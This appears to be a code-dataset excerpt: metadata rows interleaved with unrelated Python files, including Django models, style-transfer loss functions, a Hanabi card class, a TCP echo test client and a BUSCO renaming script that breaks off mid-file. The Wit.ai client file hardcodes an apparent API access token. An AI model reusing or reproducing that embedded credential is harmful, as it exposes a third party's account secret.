| 22.444444 | 76 | 0.663366 | 89 | 606 | 4.269663 | 0.483146 | 0.126316 | 0.115789 | 0.142105 | 0.173684 | 0.173684 | 0.173684 | 0 | 0 | 0 | 0 | 0.027957 | 0.232673 | 606 | 26 | 77 | 23.307692 | 0.789247 | 0.268977 | 0 | 0 | 0 | 0 | 0.019417 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.357143 | 0 | 0.428571 | 0.071429 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 |
22aec8fbe47f7975a1e7f4a0caa5c88c56e4a03e | 1,133 | py | Python | data/train/python/22aec8fbe47f7975a1e7f4a0caa5c88c56e4a03e__init__.py | harshp8l/deep-learning-lang-detection | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | [
"MIT"
] | 84 | 2017-10-25T15:49:21.000Z | 2021-11-28T21:25:54.000Z | data/train/python/22aec8fbe47f7975a1e7f4a0caa5c88c56e4a03e__init__.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 5 | 2018-03-29T11:50:46.000Z | 2021-04-26T13:33:18.000Z | data/train/python/22aec8fbe47f7975a1e7f4a0caa5c88c56e4a03e__init__.py | vassalos/deep-learning-lang-detection | cbb00b3e81bed3a64553f9c6aa6138b2511e544e | [
"MIT"
] | 24 | 2017-11-22T08:31:00.000Z | 2022-03-27T01:22:31.000Z | def save_form(form, actor=None):
"""Allows storing a form with a passed actor. Normally, Form.save() does not accept an actor, but if you require
this to be passed (is not handled by middleware), you can use this to replace form.save().
Requires you to use the audit.Model model as the actor is passed to the object's save method.
"""
obj = form.save(commit=False)
obj.save(actor=actor)
form.save_m2m()
return obj
#def intermediate_save(instance, actor=None):
# """Allows saving of an instance, without storing the changes, but keeping the history. This allows you to perform
# intermediate saves:
#
# obj.value1 = 1
# intermediate_save(obj)
# obj.value2 = 2
# obj.save()
# <value 1 and value 2 are both stored in the database>
# """
# if hasattr(instance, '_audit_changes'):
# tmp = instance._audit_changes
# if actor:
# instance.save(actor=actor)
# else:
# instance.save()
# instance._audit_changes = tmp
# else:
# if actor:
# instance.save(actor=actor)
# else:
# instance.save()
| 32.371429 | 118 | 0.634598 | 156 | 1,133 | 4.544872 | 0.423077 | 0.045134 | 0.059238 | 0.06488 | 0.126939 | 0.126939 | 0.126939 | 0.126939 | 0.126939 | 0 | 0 | 0.008383 | 0.263019 | 1,133 | 34 | 119 | 33.323529 | 0.840719 | 0.826125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22b2735d6e9bb2b53a0a0541af9ec0a4bc2db7e4 | 738 | py | Python | pair.py | hhgarnes/python-validity | 82b42e4fd152f10f75584de56502fd9ada299bb5 | [
"MIT"
] | null | null | null | pair.py | hhgarnes/python-validity | 82b42e4fd152f10f75584de56502fd9ada299bb5 | [
"MIT"
] | null | null | null | pair.py | hhgarnes/python-validity | 82b42e4fd152f10f75584de56502fd9ada299bb5 | [
"MIT"
] | null | null | null |
from time import sleep
from proto9x.usb import usb
from proto9x.tls import tls
from proto9x.flash import read_flash
from proto9x.init_flash import init_flash
from proto9x.upload_fwext import upload_fwext
from proto9x.calibrate import calibrate
from proto9x.init_db import init_db
#usb.trace_enabled=True
#tls.trace_enabled=True
def restart():
    print('Sleeping...')
    sleep(3)
    tls.reset()
    usb.open()
    usb.send_init()
    tls.parseTlsFlash(read_flash(1, 0, 0x1000))
    tls.open()

usb.open()
print('Initializing flash...')
init_flash()
restart()
print('Uploading firmware...')
upload_fwext()
restart()
print('Calibrating...')
calibrate()
print('Init database...')
init_db()
print('That\'s it, pairing\'s finished')
| 18.45 | 47 | 0.734417 | 105 | 738 | 5.028571 | 0.371429 | 0.145833 | 0.060606 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.023511 | 0.135501 | 738 | 39 | 48 | 18.923077 | 0.804075 | 0.059621 | 0 | 0.142857 | 0 | 0 | 0.141823 | 0 | 0 | 0 | 0.008683 | 0 | 0 | 1 | 0.035714 | true | 0 | 0.285714 | 0 | 0.321429 | 0.214286 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22b61a63d3fab6ac5a4af3febf6a8b869aa2fb13 | 926 | py | Python | tests/tools/test-tcp4-client.py | jimmy-huang/zephyr.js | cef5c0dffaacf7d5aa3f8265626f68a1e2b32eb5 | [
"Apache-2.0"
] | null | null | null | tests/tools/test-tcp4-client.py | jimmy-huang/zephyr.js | cef5c0dffaacf7d5aa3f8265626f68a1e2b32eb5 | [
"Apache-2.0"
] | null | null | null | tests/tools/test-tcp4-client.py | jimmy-huang/zephyr.js | cef5c0dffaacf7d5aa3f8265626f68a1e2b32eb5 | [
"Apache-2.0"
] | null | null | null | # !usr/bin/python
# coding:utf-8
import time
import socket
def main():
    print "Socket client created successfully"
    host = "192.0.2.1"
    port = 9876
    bufSize = 1024
    addr = (host, port)
    Timeout = 300
    mySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    mySocket.settimeout(Timeout)
    mySocket.connect(addr)
    while 1:
        try:
            Data = mySocket.recv(bufSize)
            Data = Data.strip()
            print "Got data: ", Data
            time.sleep(2)
            if Data == "close":
                mySocket.close()
                print "close socket"
                break
            else:
                mySocket.sendall(Data)
                print "Send data: ", Data
        except KeyboardInterrupt:
            print "exit client"
            break
        except:
            print "time out"
            continue


if __name__ == "__main__":
    main()
| 20.577778 | 64 | 0.512959 | 95 | 926 | 4.894737 | 0.557895 | 0.051613 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035651 | 0.394168 | 926 | 44 | 65 | 21.045455 | 0.793226 | 0.030238 | 0 | 0.060606 | 0 | 0 | 0.116201 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.060606 | null | null | 0.181818 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22b976d4af390f9c20bc3dedbfcb6376fdbf0308 | 5,277 | py | Python | hw2/deeplearning/style_transfer.py | axelbr/berkeley-cs182-deep-neural-networks | 2bde27d9d5361d48dce7539d00b136209c1cfaa1 | [
"MIT"
] | null | null | null | hw2/deeplearning/style_transfer.py | axelbr/berkeley-cs182-deep-neural-networks | 2bde27d9d5361d48dce7539d00b136209c1cfaa1 | [
"MIT"
] | null | null | null | hw2/deeplearning/style_transfer.py | axelbr/berkeley-cs182-deep-neural-networks | 2bde27d9d5361d48dce7539d00b136209c1cfaa1 | [
"MIT"
] | null | null | null | import numpy as np
import torch
import torch.nn.functional as F
def content_loss(content_weight, content_current, content_target):
"""
Compute the content loss for style transfer.
Inputs:
- content_weight: Scalar giving the weighting for the content loss.
- content_current: features of the current image; this is a PyTorch Tensor of shape
(1, C_l, H_l, W_l).
- content_target: features of the content image, Tensor with shape (1, C_l, H_l, W_l).
Returns:
- scalar content loss
"""
##############################################################################
# YOUR CODE HERE #
##############################################################################
_, C, H, W = content_current.shape
current_features = content_current.view(C, H*W)
target_features = content_target.view(C, H*W)
loss = content_weight * torch.sum(torch.square(current_features - target_features))
return loss
##############################################################################
# END OF YOUR CODE #
##############################################################################
def gram_matrix(features, normalize=True):
"""
Compute the Gram matrix from features.
Inputs:
- features: PyTorch Variable of shape (N, C, H, W) giving features for
a batch of N images.
- normalize: optional, whether to normalize the Gram matrix
If True, divide the Gram matrix by the number of neurons (H * W * C)
Returns:
- gram: PyTorch Variable of shape (N, C, C) giving the
(optionally normalized) Gram matrices for the N input images.
"""
##############################################################################
# YOUR CODE HERE #
##############################################################################
C, H, W = features.shape[-3], features.shape[-2], features.shape[-1]
reshaped = features.view(-1, C, H*W)
G = reshaped @ reshaped.transpose(dim0=1, dim1=2)
if normalize:
G = G / (H*W*C)
return G
##############################################################################
# END OF YOUR CODE #
##############################################################################
def style_loss(feats, style_layers, style_targets, style_weights):
    """
    Computes the style loss at a set of layers.
    Inputs:
    - feats: list of the features at every layer of the current image, as produced by
      the extract_features function.
    - style_layers: List of layer indices into feats giving the layers to include in the
      style loss.
    - style_targets: List of the same length as style_layers, where style_targets[i] is
      a PyTorch Variable giving the Gram matrix of the source style image computed at
      layer style_layers[i].
    - style_weights: List of the same length as style_layers, where style_weights[i]
      is a scalar giving the weight for the style loss at layer style_layers[i].
    Returns:
    - style_loss: A PyTorch Variable holding a scalar giving the style loss.
    """
    # Hint: you can do this with one for loop over the style layers, and should
    # not be very much code (~5 lines). You will need to use your gram_matrix function.
    ##############################################################################
    #                              YOUR CODE HERE                                #
    ##############################################################################
    loss = 0
    for i, l in enumerate(style_layers):
        A, G = style_targets[i], gram_matrix(feats[l])
        loss += style_weights[i] * torch.sum(torch.square(G - A))
    return loss
    ##############################################################################
    #                             END OF YOUR CODE                               #
    ##############################################################################


def tv_loss(img, tv_weight):
    """
    Compute total variation loss.
    Inputs:
    - img: PyTorch Variable of shape (1, 3, H, W) holding an input image.
    - tv_weight: Scalar giving the weight w_t to use for the TV loss.
    Returns:
    - loss: PyTorch Variable holding a scalar giving the total variation loss
      for img weighted by tv_weight.
    """
    # Your implementation should be vectorized and not require any loops!
    ##############################################################################
    #                              YOUR CODE HERE                                #
    ##############################################################################
    tv = torch.square(img[..., 1:, :-1] - img[..., :-1, :-1]) + torch.square(img[..., :-1, 1:] - img[..., :-1, :-1])
    return tv_weight * torch.sum(tv)
    ##############################################################################
    #                             END OF YOUR CODE                               #
    ##############################################################################
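As a sanity check on the total-variation idea above, here is a small NumPy sketch of the same kind of penalty. Note it uses the standard full-slice neighbour differences rather than the exact cropping in the code above, so the numbers are illustrative, not identical to the PyTorch version:

```python
import numpy as np

def tv_loss_np(img, tv_weight):
    """Sum of squared differences between vertically and horizontally
    adjacent pixels, scaled by tv_weight. img has shape (1, C, H, W)."""
    h_diff = img[..., 1:, :] - img[..., :-1, :]   # vertical neighbours
    w_diff = img[..., :, 1:] - img[..., :, :-1]   # horizontal neighbours
    return tv_weight * (np.sum(h_diff ** 2) + np.sum(w_diff ** 2))

img = np.array([[[[1.0, 2.0], [3.0, 4.0]]]])  # shape (1, 1, 2, 2)
result = tv_loss_np(img, 0.5)  # (4 + 4) + (1 + 1) = 10, scaled by 0.5 -> 5.0
```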
| 45.886957 | 116 | 0.437938 | 532 | 5,277 | 4.25188 | 0.246241 | 0.007958 | 0.007958 | 0.022989 | 0.181256 | 0.157383 | 0.1229 | 0.066313 | 0.037135 | 0.037135 | 0 | 0.005672 | 0.264923 | 5,277 | 114 | 117 | 46.289474 | 0.577468 | 0.481713 | 0 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.035088 | 0 | 1 | 0.16 | false | 0 | 0.12 | 0 | 0.44 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22c0a198d3ffbdb90c8a504d310e057f35103de5 | 2,740 | py | Python | site_settings/models.py | shervinbdndev/Django-Shop | baa4e7b91fbdd01ee591049c12cd9fbfaa434379 | [
"MIT"
] | 13 | 2022-02-25T05:04:58.000Z | 2022-03-15T10:55:24.000Z | site_settings/models.py | iTsSobhan/Django-Shop | 9eb6a08c6e93e5401d6bc2eeb30f2ef35adec730 | [
"MIT"
] | null | null | null | site_settings/models.py | iTsSobhan/Django-Shop | 9eb6a08c6e93e5401d6bc2eeb30f2ef35adec730 | [
"MIT"
] | 1 | 2022-03-03T09:21:49.000Z | 2022-03-03T09:21:49.000Z | from django.db import models
class SiteSettings(models.Model):
    site_name = models.CharField(max_length=200, verbose_name='Site Name')
    site_url = models.CharField(max_length=200, verbose_name='Site URL')
    site_address = models.CharField(max_length=300, verbose_name='Site Address')
    site_phone = models.CharField(max_length=100, null=True, blank=True, verbose_name='Site Phone')
    site_fax = models.CharField(max_length=200, null=True, blank=True, verbose_name='Site Fax')
    site_email = models.EmailField(max_length=200, null=True, blank=True, verbose_name='Site Email')
    about_us_text = models.TextField(verbose_name='About Us Text')
    site_copy_right = models.TextField(verbose_name='Copyright Text')
    site_logo = models.ImageField(upload_to='images/site-setting/', verbose_name='Site Logo')
    is_main_setting = models.BooleanField(verbose_name='Site Main Settings')

    def __str__(self) -> str:
        return self.site_name

    class Meta:
        verbose_name = 'Site Setting'
        verbose_name_plural = 'Site Settings'


class FooterLinkBox(models.Model):
    title = models.CharField(max_length=200, verbose_name='Title')

    def __str__(self) -> str:
        return self.title

    class Meta:
        verbose_name = 'Footer Link Setting'
        verbose_name_plural = 'Footer Link Settings'


class FooterLink(models.Model):
    title = models.CharField(max_length=200, verbose_name='Title')
    url = models.URLField(max_length=500, verbose_name='Links')
    footer_link_box = models.ForeignKey(to=FooterLinkBox, verbose_name='Category', on_delete=models.CASCADE)

    def __str__(self) -> str:
        return self.title

    class Meta:
        verbose_name = 'Footer Link'
        verbose_name_plural = 'Footer Links'


class Slider(models.Model):
    title = models.CharField(max_length=200, verbose_name='Title')
    description = models.TextField(verbose_name='Slider Description')
    url_title = models.CharField(max_length=200, verbose_name='URL Title')
    url = models.URLField(max_length=200, verbose_name='URL Address')
    image = models.ImageField(upload_to='images/sliders', verbose_name='Slider Image')
    is_active = models.BooleanField(default=False, verbose_name='Active / Inactive')

    def __str__(self) -> str:
        return self.title

    class Meta:
        verbose_name = 'Slider'
verbose_name_plural = 'Sliders' | 36.052632 | 110 | 0.670073 | 329 | 2,740 | 5.285714 | 0.218845 | 0.177113 | 0.093157 | 0.124209 | 0.456584 | 0.372053 | 0.327775 | 0.309373 | 0.236343 | 0.212191 | 0 | 0.016941 | 0.224453 | 2,740 | 76 | 111 | 36.052632 | 0.801412 | 0 | 0 | 0.285714 | 0 | 0 | 0.124042 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.081633 | false | 0 | 0.020408 | 0 | 0.755102 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
22c745e9fe90945bd78c2b0b4951b89a65ce5057 | 3,482 | py | Python | py_hanabi/card.py | krinj/hanabi-simulator | b77b04aa09bab8bd8d7b784e04bf8b9d5d76d1a6 | [
"MIT"
] | 1 | 2018-09-28T00:47:52.000Z | 2018-09-28T00:47:52.000Z | py_hanabi/card.py | krinj/hanabi-simulator | b77b04aa09bab8bd8d7b784e04bf8b9d5d76d1a6 | [
"MIT"
] | null | null | null | py_hanabi/card.py | krinj/hanabi-simulator | b77b04aa09bab8bd8d7b784e04bf8b9d5d76d1a6 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
A card (duh).
"""
import random
import uuid
from enum import Enum
from typing import List
from py_hanabi.settings import CARD_DECK_DISTRIBUTION
__author__ = "Jakrin Juangbhanich"
__email__ = "juangbhanich.k@gmail.com"
class Color(Enum):
    RED = 1
    BLUE = 2
    GREEN = 3
    YELLOW = 4
    WHITE = 5


class Card:
    def __init__(self, number: int, color: Color):
        self._number: int = number
        self._color: Color = color
        self._id: str = uuid.uuid4().hex
        self._hint_number_counter: int = 0
        self._hint_color_counter: int = 0
        # self._index_hinted: List[int] = []
        # self._lone_hinted: List[bool] = []

        # According to hints, these are the ones we know it is NOT.
        self.not_color: List[Color] = []
        self.not_number: List[int] = []

    def __repr__(self):
        hint_str = ""
        if self.hint_received_color:
            hint_str += "C"
        if self.hint_received_number:
            hint_str += "N"
        return f"[{self.color} {self.number} {hint_str}]"

    def __eq__(self, other: 'Card'):
        return self.color == other.color and self.number == other.number

    def receive_hint_number(self, number: int):
        if number == self.number:
            self._hint_number_counter += 1
        else:
            self.not_number.append(number)

    def receive_hint_color(self, color: Color):
        if color == self.color:
            self._hint_color_counter += 1
        else:
            self.not_color.append(color)

    def remove_hint_number(self, number: int):
        if number == self.number:
            self._hint_number_counter -= 1
        else:
            self.not_number.pop()

    def remove_hint_color(self, color: Color):
        if color == self.color:
            self._hint_color_counter -= 1
        else:
            self.not_color.pop()

    @property
    def label(self):
        return f"{self.number} of {self.get_color_label(self.color)}"

    @property
    def id(self) -> str:
        return self._id

    @property
    def key(self) -> tuple:
        return self.get_key(self.color, self.number)

    @staticmethod
    def get_key(c: Color, n: int) -> tuple:
        return c, n

    @property
    def number(self) -> int:
        return self._number

    @property
    def color(self) -> Color:
        return self._color

    @property
    def observed_color(self) -> Color:
        return None if not self.hint_received_color else self._color

    @property
    def observed_number(self) -> int:
        return None if not self.hint_received_number else self._number

    @property
    def hint_received_number(self) -> bool:
        return self._hint_number_counter > 0

    @property
    def hint_received_color(self) -> bool:
        return self._hint_color_counter > 0

    @staticmethod
    def generate_deck() -> List['Card']:
        """ Generate the starting deck for the game. """
        deck: List[Card] = []
        for color in Color:
            for i in CARD_DECK_DISTRIBUTION:
                card = Card(i, color)
                deck.append(card)
        random.shuffle(deck)
        return deck

    @staticmethod
    def get_color_label(color: Color) -> str:
        color_labels = {
            Color.BLUE: "Blue",
            Color.RED: "Red",
            Color.YELLOW: "Yellow",
            Color.GREEN: "Green",
            Color.WHITE: "White",
        }
        return color_labels[color]
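For context, `generate_deck` simply crosses `CARD_DECK_DISTRIBUTION` with every `Color`. A self-contained sketch of the same construction — note `settings.py` is not shown here, so the `[1, 1, 1, 2, 2, 3, 3, 4, 4, 5]` distribution below is an assumption (it is the standard Hanabi one):

```python
import random
from enum import Enum

class Color(Enum):
    RED = 1
    BLUE = 2
    GREEN = 3
    YELLOW = 4
    WHITE = 5

# Assumed distribution: three 1s, two each of 2-4, one 5 (standard Hanabi).
CARD_DECK_DISTRIBUTION = [1, 1, 1, 2, 2, 3, 3, 4, 4, 5]

deck = [(number, color) for color in Color for number in CARD_DECK_DISTRIBUTION]
random.shuffle(deck)
# 5 colors x 10 cards per color = 50 cards in the starting deck.
```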
| 24.871429 | 72 | 0.587881 | 435 | 3,482 | 4.471264 | 0.222989 | 0.064781 | 0.043188 | 0.043188 | 0.243702 | 0.192288 | 0.192288 | 0.160411 | 0.160411 | 0.160411 | 0 | 0.006203 | 0.305572 | 3,482 | 139 | 73 | 25.05036 | 0.79818 | 0.059161 | 0 | 0.2 | 0 | 0 | 0.050952 | 0.017802 | 0 | 0 | 0 | 0 | 0 | 1 | 0.19 | false | 0 | 0.05 | 0.11 | 0.45 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 |
22c78686c8b8a763f3206d86fcbc87e20d6ea1aa | 1,186 | py | Python | setup.py | d2gex/distpickymodel | 7acd4ffafbe592d6336d91d6e7411cd45357e41c | [
"MIT"
] | null | null | null | setup.py | d2gex/distpickymodel | 7acd4ffafbe592d6336d91d6e7411cd45357e41c | [
"MIT"
] | null | null | null | setup.py | d2gex/distpickymodel | 7acd4ffafbe592d6336d91d6e7411cd45357e41c | [
"MIT"
] | null | null | null | import setuptools
import distpickymodel
def get_long_desc():
    with open("README.rst", "r") as fh:
        return fh.read()


setuptools.setup(
    name="distpickymodel",
    version=distpickymodel.__version__,
    author="Dan G",
    author_email="daniel.garcia@d2garcia.com",
    description="A shared Mongoengine-based model library",
    long_description=get_long_desc(),
    url="https://github.com/d2gex/distpickymodel",
    # Exclude 'tests' and 'docs'
    packages=['distpickymodel'],
    python_requires='>=3.6',
    install_requires=['pymongo>=3.7.2', 'mongoengine>=0.17.0', 'six'],
    tests_require=['pytest>=4.4.0', 'PyYAML>=5.1'],
    classifiers=[
        'Development Status :: 5 - Production/Stable',
        'Environment :: Web Environment',
        'Environment :: Console',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3.6',
        'Programming Language :: Python :: 3.7',
        'Programming Language :: Python :: Implementation :: CPython',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ]
)
| 32.944444 | 71 | 0.636594 | 126 | 1,186 | 5.888889 | 0.690476 | 0.076819 | 0.101078 | 0.070081 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.02246 | 0.211636 | 1,186 | 35 | 72 | 33.885714 | 0.771123 | 0.021922 | 0 | 0 | 0 | 0 | 0.522453 | 0.022453 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | true | 0 | 0.066667 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22cc300c5aa21f713c2ef3f3b60722cc7d238f97 | 1,163 | py | Python | rdl/data_sources/DataSourceFactory.py | pageuppeople-opensource/relational-data-loader | 0bac7036d65636d06eacca4e68e09d6e1c506ea4 | [
"MIT"
] | 2 | 2019-03-11T12:45:23.000Z | 2019-04-05T05:22:43.000Z | rdl/data_sources/DataSourceFactory.py | pageuppeople-opensource/relational-data-loader | 0bac7036d65636d06eacca4e68e09d6e1c506ea4 | [
"MIT"
] | 5 | 2019-02-08T03:23:25.000Z | 2019-04-11T01:29:45.000Z | rdl/data_sources/DataSourceFactory.py | PageUpPeopleOrg/relational-data-loader | 0bac7036d65636d06eacca4e68e09d6e1c506ea4 | [
"MIT"
] | 1 | 2019-03-04T04:08:49.000Z | 2019-03-04T04:08:49.000Z | import logging
from rdl.data_sources.MsSqlDataSource import MsSqlDataSource
from rdl.data_sources.AWSLambdaDataSource import AWSLambdaDataSource
class DataSourceFactory(object):
    def __init__(self, logger=None):
        self.logger = logger or logging.getLogger(__name__)
        self.sources = [MsSqlDataSource, AWSLambdaDataSource]

    def create_source(self, connection_string):
        for source in self.sources:
            if source.can_handle_connection_string(connection_string):
                self.logger.info(
                    f"Found handler '{source}' for given connection string."
                )
                return source(connection_string)
        raise RuntimeError(
            "There are no data sources that can handle this connection string"
        )

    def is_prefix_supported(self, connection_string):
        for source in self.sources:
            if source.can_handle_connection_string(connection_string):
                return True
        return False

    def get_supported_source_prefixes(self):
        return list(
            map(lambda source: source.get_connection_string_prefix(), self.sources)
        )
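The factory asks each registered source class whether it can handle the connection string and instantiates the first match. A self-contained sketch of that dispatch pattern with a stub source class (the stub class and its `mssql+pyodbc://` prefix are made up for illustration):

```python
class StubMsSqlSource:
    prefix = "mssql+pyodbc://"

    def __init__(self, connection_string):
        self.connection_string = connection_string

    @staticmethod
    def can_handle_connection_string(connection_string):
        return connection_string.startswith(StubMsSqlSource.prefix)

class StubFactory:
    def __init__(self):
        # In the real factory this list holds the concrete data source classes.
        self.sources = [StubMsSqlSource]

    def create_source(self, connection_string):
        for source in self.sources:
            if source.can_handle_connection_string(connection_string):
                return source(connection_string)
        raise RuntimeError("No data source can handle this connection string")

factory = StubFactory()
source = factory.create_source("mssql+pyodbc://server/db")
```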
| 35.242424 | 83 | 0.674979 | 124 | 1,163 | 6.08871 | 0.41129 | 0.211921 | 0.029139 | 0.047682 | 0.24106 | 0.24106 | 0.24106 | 0.24106 | 0.24106 | 0.24106 | 0 | 0 | 0.263113 | 1,163 | 32 | 84 | 36.34375 | 0.88098 | 0 | 0 | 0.153846 | 0 | 0 | 0.100602 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.115385 | 0.038462 | 0.461538 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22cd87f92115b6affd305877641e7e519dbd0eb4 | 476 | py | Python | server/WitClient.py | owo/jitalk | 2db2782282a2302b4cf6049030822734a6856982 | [
"MIT"
] | 1 | 2020-06-22T14:28:41.000Z | 2020-06-22T14:28:41.000Z | server/WitClient.py | owo/jitalk | 2db2782282a2302b4cf6049030822734a6856982 | [
"MIT"
] | null | null | null | server/WitClient.py | owo/jitalk | 2db2782282a2302b4cf6049030822734a6856982 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import wit
import json
class WitClient(object):
    """docstring for WitClient"""
    _access_token = 'NBPOVLY7T6W3KOUEML2GXOWODH3LPWPD'

    def __init__(self):
        wit.init()

    def text_query(self, text):
        res = json.loads(wit.text_query(text, WitClient._access_token))
        return res["outcomes"]

    def close_connection(self):
        wit.close()


if __name__ == "__main__":
print "You ran the Wit client, nothing will happen. Exiting..." | 20.695652 | 65 | 0.707983 | 62 | 476 | 5.129032 | 0.66129 | 0.09434 | 0.125786 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014851 | 0.151261 | 476 | 23 | 66 | 20.695652 | 0.772277 | 0.088235 | 0 | 0 | 0 | 0 | 0.254951 | 0.079208 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.153846 | null | null | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
22cf943746c3603f630cb274d2c1d26e36acc1fd | 3,472 | py | Python | python_scripts/BUSCO_phylogenetics/rename_all_fa_seq.py | peterthorpe5/Methods_M.cerasi_R.padi_genome_assembly | c6cb771afaf40f5def47e33ff11cd8867ec528e0 | [
"MIT"
] | 4 | 2019-04-01T02:08:21.000Z | 2022-02-04T08:37:47.000Z | python_scripts/BUSCO_phylogenetics/rename_all_fa_seq.py | peterthorpe5/Methods_M.cerasi_R.padi_genome_assembly | c6cb771afaf40f5def47e33ff11cd8867ec528e0 | [
"MIT"
] | 1 | 2018-09-30T00:29:43.000Z | 2018-10-01T07:51:16.000Z | python_scripts/BUSCO_phylogenetics/rename_all_fa_seq.py | peterthorpe5/Methods_M.cerasi_R.padi_genome_assembly | c6cb771afaf40f5def47e33ff11cd8867ec528e0 | [
"MIT"
] | 1 | 2019-12-05T09:04:38.000Z | 2019-12-05T09:04:38.000Z | #!/usr/bin/env python
# author: Peter Thorpe September 2015. The James Hutton Institute, Dundee, UK.
# title: rename single copy busco genes
from Bio.Seq import Seq
from Bio.SeqRecord import SeqRecord
from Bio import SeqIO
import os
from sys import stdin,argv
import sys
from optparse import OptionParser
########################################################################
# functions
def parse_busco_file(busco):
    """this is a function to open busco full output
    and get a list of duplicated genes. This list is required
    so we can ignore these genes later. Takes file,
    returns list"""
    duplicated_list = []
    with open(busco) as handle:
        for line in handle:
            if not line.strip():
                continue  # if the last line is blank
            if line.startswith("#"):
                continue
            if not line:
                print ("your file is empty")
                return False
            line_info = line.rstrip().split("\t")
            # first element
            Busco_name = line_info[0]
            # second element
            status = line_info[1]
            if status == "Duplicated" or status == "Fragmented":
                duplicated_list.append(Busco_name)
    return duplicated_list


def reformat_as_fasta(filename, prefix, outfile):
    "this function re-writes a file as a fasta file"
    f = open(outfile, 'w')
    fas = open(filename, "r")
    for line in fas:
        if not line.strip():
            continue  # if the last line is blank
        if line.startswith("#"):
            continue
        if not line:
            return False
        if not line.startswith(">"):
            seq = line
            title = ">" + prefix + "_" + filename.replace("BUSCOa", "").split(".fas")[0]
            data = "%s\n%s\n" % (title, seq)
            f.write(data)
    f.close()


if "-v" in sys.argv or "--version" in sys.argv:
    print "v0.0.1"
    sys.exit(0)

usage = """Use as follows:

converts

$ python renaem....py -p Mce -b full_table_BUSCO_output

script to walk through all files in a folder and rename the seq id
to start with Prefix.
Used for Busco output.
give it the busco full output table. The script will only return
complete single copy genes. Duplicated genes will be ignored.
"""

parser = OptionParser(usage=usage)
parser.add_option("-p", "--prefix", dest="prefix",
                  default=None,
                  help="Output filename",
                  metavar="FILE")
